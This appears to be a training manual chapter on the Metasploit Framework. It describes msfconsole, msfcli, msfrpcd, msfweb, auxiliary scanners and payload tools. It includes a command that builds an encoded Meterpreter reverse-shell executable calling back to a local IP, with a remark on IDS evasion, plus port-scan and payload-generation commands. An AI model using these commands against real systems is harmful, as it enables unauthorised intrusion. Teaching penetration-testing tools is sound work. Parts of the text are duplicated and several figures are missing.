Backtrack Manual Part6

Project ReportProject Report

onon

Project by - Nutan Kumar Panda

Technology Evangelist ISEH

R&D - ATL Guwahati

Project By: Nutan Kumar Panda

Metasploit

The MSF is an open-source tool, which provides a framework for security researchers to develop exploits payloads, payload encoders, and tools for reconnaissance and other security testing purposes. Although, it initially started off as a collection of exploits and provided the ability for large chunks of code to be re-used across different exploits, in its current form it provides extensive capabilities for the design and development of reconnaissance, exploitation, and post- exploitation security tools.

Exploitation

Exploitation involves code that performs a number of key functions, such as:

1. Connecting to the remote system on the vulnerable port.

2. Exchanging initial protocol sequence until the vulnerable fault injection point is reached.

3. Injecting exploit code, which includes instructions for the return address to be modified to point directly or indirectly into our payload, as well as NOP instructions, which increase the chances that our code will eventually be executed.

4. Post-exploitation fun, which could be either connecting to a command prompt.

5. bound to a listening port on the compromised system, or connecting to the remote system with the username and password of a user that has been created as part of the exploit process, or it could mean connecting with a GUI client to a remote GUI (such as VNC).

Understanding Metasploit Channels

The latest version of Metasploit now provides the user with multiple channels to interface with it. These allow a very high degree of flexibility for different requirements or situations such as:

A single user exploiting a single target. A single user exploiting multiple targets during one session, either in interactive or in

batch mode. Opening multiple payload sessions at once Suspending and restoring payload sessions. Sharing payload sessions with other users. A group of penetration testers collaborating on testing the same network or different

networks. A penetration tester remotely logging in to the pre-configured Metasploit system, and

launching exploits from there.


The channels available with Metasploit v3.x are listed below:

The Directory Structure of the Framework

Updating Metasploit

The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through a HTTP proxy server, please see the Subversion FAQ on proxy access:

http://subversion.tigris.org/faq.html#proxy

One of the primary values of Metasploit is that it is constantly being updated to provide exploits

for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g before every use), you give yourself the best

chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you’ve downloaded Metasploit, you now keep it up to date simply by using your Subversion client of choice to “update” the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:

svn update

At revision 4532.

This isn’t a particularly exciting example because my Metasploit was already up to date, but then again, that’s a good thing. If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:


http://metasploit.com/projects/Framework/msf3/

http://metasploit.com/projects/Framework/msf3/

http://subversion.tigris.org/faq.html#proxy

svn update

UU modules/nops/ppc/simple.rb

UU modules/nops/x86/opty2.rb

UU modules/nops/x86/single_byte.rb

UU modules/nops/nop_test.rb.ut.rb

A modules/nops/php

A modules/nops/php/generic.rb

UU modules/nops/sparc/random.rb

…………

………..

Updated to version 4532

Msfopcode

The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site.With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are available when executing this utility with the –h switch. This interface is merely a front end to the ex::Exploitation::OpcodeDb::Client class interface that interfaces with a HTTP-based XML protocol running on the Metasploit.com Web server.

./msfopcode

Usage: msfopcode command

SUPPORTED COMMANDS

stats Display database statistics

locales Display supported locales

metatypes Display Supported opcode meta types (Ex: imp reg)

groups Display supported opcode groups (Ex:esp=>eip)


types Display supported opcode type (Ex: imp esp)

platforms Display supported platforms

modules Display information about specific modules

search Search for opcode given a set of criteria

The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated. The output to this command looks something like this:

./msfopcode stats

Last Updated : Sat Sep 03 01:32:00 CDT 2005

Number of Opcodes : 12177419

Number of Opcode Types : 320

Number of Platforms : 14

Number of Architectures : 1

Number of Modules : 17683

Number of Module Segments: 71457

Number of Module Imports : 2065492

Number of Module Exports : 927637

Msfrpc/ Msfrpcd

The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected. The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected.The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.

[ USAGE ]

To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.


./msfrpcd -P s3cr3tp4ss

- or -

msf> load xmlrpc Pass=password

Once the interface is started, any compatible RPC interface be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.

./msfrpc -h server_name -P s3cr3tp4ss

[*] The 'rpc' object holds the RPC client interface

>> rpc.call("core.version")

=> {"version"=>"3.3-dev"}

Msfd

The msfd utility opens a network interface to the msfconsole. It can be executed by specifying the IP address and the port on which it should listen for incoming connections.This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:

msfd -a 192.168.137.128 –d –p 55554

Msfelfscan/ Msfpescan/ Msfmachscan

Msfelfscan, used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows binaries.

Auxiliary Modules

Auxiliary modules are essentially used to cover the first stage of a penetration test—fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for Distributed Computing Environment Remote Procedure Call [DCERPC], HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols. Any exploitation code that does not use a payload would be part of the auxiliary module system.This currently includes


dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).

List all auxiliary modules

Metasploit 3.0 supports the auxiliary modules which can be used to perform arbitrary, one-o_ actions such as port scanning, denial of service, and even fuzzing.

Now use the appropriate auxiliary module as per your requirement:

msf > use scanner/portscan/tcp

msf > show options

msf > set rhosts 192.168.1.100 or 192.168.1.1/24

msf > set ports 1-1024

msf > run


TCP portscan Result

Msfgui

The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.

This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interface. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory

./msfgui

The Metasploit Graphical User Interface


Msfcli

The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability. A simple shell script can be written, which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the –h switch gives us the options available with this interface A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:

1. Display information about a selected exploit ./msfcli <exploit_name> S

2. Show available payloads ./msfcli <exploit_name> P

3. Choose the payload with this exploit, and display the options that need to be set

./msfcli <exploit_name> PAYLOAD=<payload_name> O

4. List available targets ./msfcli <exploit_name> PAYLOAD=<payload_name> T


5. Set the required options in option=value form and execute with the E mode

Exploiting Windows Box with Msfcli

Msfweb

The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).

The main msfweb interface consists of a toolbar containing various icons and a background with the metasploit logo. If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, con_guring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.


The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the –h switch, as shown in the following example:

./msfweb –h

Usage: msfweb <options>

OPTIONS:

-a <opt> Bind to this IP address instead of loopback

-d Daemonize the web server

-h Help banner

-p <opt> Bind to this port instead of 55555

-v <opt> A number between 0 and 3 that controls log verbosity

For instance, the following command would launch the Web interface on IP address

192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).

./msfweb -a 192.168.1.10 –d

Now on any browser type url

http://192.168.1.10:5555


http://192.168.1.10:5555/

Msfencode

The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed out using the –l option. Other options that can be used are available using the –h switch.

A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or to read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability. Let’s say we want to encode the payload, but limit ourselves to an alpha-numeric output. We would also like to avoid the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command As can be seen, the size of the output has increased due to the encoding—it was 116 bytes after running the msfpayload command where we redirected the output in raw format to the file in_exec_raw. But when this file is given as input to the encoder, it is now 296 bytes.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444

R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe


Generating encoded executable meterpreter reverse Payload

Msfpayload

The msfpayload utility enables the user to modify existing payloads depending on supplied parameters on the command line, and obtain the output in C, Perl, Ruby or Raw.The following example illustrates the use of msfpayload. The msfpayload –h command lists out the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific Payload.

After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload, and produce an output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output with the Raw format, which allows it to be piped to another program, such as msfencode, or could be redirected to a file. As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created, which would execute that particular command upon successful exploitation.We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:


./msfpayload windows/exec CMD=calc.exe P

Msfconsole

The msfconsole is the traditional and primary means of using the MSF. After installation, the console can be simply launched by typing the command ./msfconsole (for UNIX) and msfconsole (for Windows) from within the path where it has been installed.The prompt that appears as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the exploit, the intuitive command to type is help and the output from this is shown below.

Launching the MSF console


Output of the help or ? Command



Education

Backtrack Manual Part6